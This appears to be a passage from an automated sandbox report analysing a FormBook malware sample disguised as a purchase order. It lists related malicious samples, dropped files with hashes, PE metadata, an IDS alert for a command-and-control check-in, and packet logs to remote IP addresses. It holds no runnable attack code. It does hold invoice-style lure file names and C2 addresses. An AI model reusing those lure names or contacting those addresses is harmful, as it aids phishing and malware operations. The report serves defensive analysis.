                                                                                        proforma invoice.exeGet hashmaliciousFormBookBrowse
                                                                                        • 194.9.94.85
                                                                                        Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                        • 194.9.94.85
                                                                                        shipping documents.exeGet hashmaliciousFormBookBrowse
                                                                                        • 194.9.94.85
                                                                                        MV Sunshine, ORDER.exeGet hashmaliciousFormBookBrowse
                                                                                        • 194.9.94.85
                                                                                        PAYROLL SUMMARY _pdf.exeGet hashmaliciousFormBookBrowse
                                                                                        • 194.9.94.85
                                                                                        AMAZON-02USORDER-401.exeGet hashmaliciousFormBookBrowse
                                                                                        • 18.139.62.226
                                                                                        https://es-proposal.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 3.164.82.77
                                                                                        http://ebaumsworld.comGet hashmaliciousUnknownBrowse
                                                                                        • 34.247.233.198
                                                                                        loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                                        • 13.238.129.232
                                                                                        loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                        • 18.255.125.141
                                                                                        loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                        • 34.212.126.28
                                                                                        loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                                        • 54.97.121.62
                                                                                        loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                        • 18.229.68.6
                                                                                        loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                        • 18.241.64.66
                                                                                        loligang.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                        • 54.171.230.55

                                                                                        JA3 Fingerprints

                                                                                        No context

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x7df799b3, page size 16384, Windows version 10.0
                                                                                        Category:dropped
                                                                                        Size (bytes):1048576
                                                                                        Entropy (8bit):0.8697691602923368
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:bSB2qSB2gSjlK/LfDalKohVF8/bGLBSBLil2d/3Cr5DHzk/3A5v7GoCnLKxKHKrx:bapaQK0yfOD8F31Xw
                                                                                        MD5:169093BEA5E6E5398C17248EC26A95C4
                                                                                        SHA1:B43581925A70A3C807CA48CF2014C1029E5A94A3
                                                                                        SHA-256:7A3E7747725223B1DCA53D85F11F6C3E8260E1ED4312FAAC04F5DC612854A107
                                                                                        SHA-512:4FF4DE323F861011DD706180B4726290A62CA33CDF75252A446961C6975CBF7104902450829D130BC92E5D025D760A0B6A9F38B3B4AACF7F7F7F24A186B13903
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:}...... ................p..*9...y......................6.3......7...|S..5...|y.h.2......7...|S.6.3...........).*9...y..........................................................................................................bJ......n....@...................................................................................................... ....................................................................................................................................................................................................................................................N...7...|Sw................m@...7...|S..........................#......6.3.....................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO 1202495088.exe.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\PO 1202495088.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1378
                                                                                        Entropy (8bit):5.375486659408667
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ML9E4K1Bj1qE4DL0E4KOKDE4KhKMaKhPKIE4oKnKoZAE4KzDa84j:MxHK1Bj1qHDL0HKOYHKh6oPtHoAhAHKS
                                                                                        MD5:73ED63431E9850D6F7BDF5E5620A055E
                                                                                        SHA1:BED1E7FE48E4BB9BFC1542090849489131D62D9C
                                                                                        SHA-256:A8BE50B0D96B60E51216C0249C38523D0AF8BD2D81DEB45CC75FA87AF3500669
                                                                                        SHA-512:8552DA1F4E1989AAE29AB323355445EC693B5AE7F315A14705A4C7688AD164B6581FE4F74C754FA75417F056C56846AEF91F82A662C0723614B05501768DF1F2
                                                                                        Malicious:true
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\9071a2976b2ef0ee49d0396431277b05\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\ca77152be4cd7af9700becb268864b42\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\S

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):0.34726597513537405
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlll:Nll
                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                        Malicious:false
                                                                                        Preview:@...e...........................................................

                                                                                        C:\Users\user\AppData\Local\Temp\--cG1-69-

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\cttune.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                        Category:dropped
                                                                                        Size (bytes):135168
                                                                                        Entropy (8bit):1.1142956103012707
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                                        MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                                        SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                                        SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                                        SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewrxkcwu.xqb.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gfurcfd2.j5s.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whnjezoi.djl.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwa2ga32.5lz.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):55
                                                                                        Entropy (8bit):4.306461250274409
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                        Malicious:false
                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):7.711488026281398
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                        File name:PO 1202495088.exe
                                                                                        File size:863'232 bytes
                                                                                        MD5:49095d080a201256f23914317e65ef4b
                                                                                        SHA1:6e5d17981778ab6e6929b486d1db0ee538ba4f10
                                                                                        SHA256:168f3f67fdf19ef0a0afabb378ee803fb3cf1f822ad37ba51772bc96a58a83d0
                                                                                        SHA512:db37966eefd9311cd0bab2e502b74de80c887db718e2d21b8248a0251f8629b103877606eaa6f7bcbb5412003edb63d0a47ef28f93300b47f78a2de786369e28
                                                                                        SSDEEP:24576:IjlIhSPd+pJH8Fa6LS1pxRW1j1/4bV0tktl8:Ijl+SPspiaVpxR01Ack
                                                                                        TLSH:3005C0C03B2AB701CE6CB934853AEDBC62642E747004B9E3AEDD3B57769D1126A1CF54
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.Zg..............0......$.......$... ...@....@.. ....................................@................................

                                                                                        File Icon

                                                                                        Icon Hash:37c38329a3924d33

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x4d24ea
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x675A8F56 [Thu Dec 12 07:23:02 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xd24980x4f.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x21e0.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xd80000xc.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x20000xd04f00xd06001d9bf94a217d159d4fb4c999cf97ff5eFalse0.8905617314037193data7.712943967967854IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0xd40000x21e00x2200d74364a92dd620c8969fab5357111417False0.9308363970588235data7.620304073873119IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0xd80000xc0x2006926706c5014ad1cf039c590f2105abcFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_ICON0xd40c80x1e1fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9939048113085203
                                                                                        RT_GROUP_ICON0xd5ef80x14data1.05
                                                                                        RT_VERSION0xd5f1c0x2c0data0.4602272727272727

                                                                                        Imports

                                                                                        DLLImport
                                                                                        mscoree.dll_CorExeMain

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-12-12T21:54:58.180357+01002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.11.2049728103.106.67.11280TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 12, 2024 21:53:52.090811968 CET4971580192.168.11.2085.159.66.93
                                                                                        Dec 12, 2024 21:53:52.343673944 CET804971585.159.66.93192.168.11.20
                                                                                        Dec 12, 2024 21:53:52.343919992 CET4971580192.168.11.2085.159.66.93
                                                                                        Dec 12, 2024 21:53:52.346287966 CET4971580192.168.11.2085.159.66.93
                                                                                        Dec 12, 2024 21:53:52.601542950 CET804971585.159.66.93192.168.11.20
                                                                                        Dec 12, 2024 21:53:52.601892948 CET4971580192.168.11.2085.159.66.93
                                                                                        Dec 12, 2024 21:53:52.603089094 CET4971580192.168.11.2085.159.66.93
                                                                                        Dec 12, 2024 21:53:52.855189085 CET804971585.159.66.93192.168.11.20
                                                                                        Dec 12, 2024 21:54:17.080965042 CET4971680192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:17.304771900 CET8049716194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:17.304980993 CET4971680192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:17.308638096 CET4971680192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:17.528906107 CET8049716194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:17.536559105 CET8049716194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:17.536618948 CET8049716194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:17.536662102 CET8049716194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:17.536705971 CET8049716194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:17.536741972 CET8049716194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:17.536773920 CET8049716194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:17.536915064 CET4971680192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:17.537075996 CET4971680192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:18.822472095 CET4971680192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:19.838762045 CET4971780192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:20.062952042 CET8049717194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:20.063163042 CET4971780192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:20.066692114 CET4971780192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:20.287251949 CET8049717194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:20.296425104 CET8049717194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:20.296483040 CET8049717194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:20.296525955 CET8049717194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:20.296570063 CET8049717194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:20.296606064 CET8049717194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:20.296643019 CET8049717194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:20.296801090 CET4971780192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:20.296802044 CET4971780192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:21.571881056 CET4971780192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:22.589507103 CET4971880192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:22.813472033 CET8049718194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:22.813663960 CET4971880192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:22.820460081 CET4971880192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:22.820538998 CET4971880192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:23.037667990 CET8049718194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:23.044744968 CET8049718194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:23.044934034 CET8049718194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:23.044944048 CET8049718194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:23.051816940 CET8049718194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:23.051830053 CET8049718194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:23.051840067 CET8049718194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:23.051850080 CET8049718194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:23.052031040 CET4971880192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:23.052042007 CET8049718194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:23.052053928 CET8049718194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:23.052301884 CET4971880192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:24.322139978 CET4971880192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:25.338787079 CET4971980192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:25.565516949 CET8049719194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:25.565715075 CET4971980192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:25.570578098 CET4971980192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:25.791971922 CET8049719194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:25.800872087 CET8049719194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:25.800926924 CET8049719194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:25.800971985 CET8049719194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:25.801156044 CET4971980192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:25.801253080 CET8049719194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:25.801306963 CET8049719194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:25.801403999 CET8049719194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:25.801609039 CET4971980192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:25.801609993 CET4971980192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:25.802946091 CET4971980192.168.11.20194.9.94.86
                                                                                        Dec 12, 2024 21:54:26.029354095 CET8049719194.9.94.86192.168.11.20
                                                                                        Dec 12, 2024 21:54:30.945960045 CET4972080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:31.059473991 CET8049720199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:31.059741020 CET4972080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:31.063124895 CET4972080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:31.176817894 CET8049720199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:31.194598913 CET8049720199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:31.194617033 CET8049720199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:31.194629908 CET8049720199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:31.194823980 CET4972080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:31.198626041 CET8049720199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:31.198892117 CET4972080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:32.572035074 CET4972080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:33.585777044 CET4972180192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:33.716805935 CET8049721199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:33.717170954 CET4972180192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:33.720623970 CET4972180192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:33.852026939 CET8049721199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:33.852073908 CET8049721199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:33.852107048 CET8049721199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:33.852339029 CET4972180192.168.11.20199.59.243.227
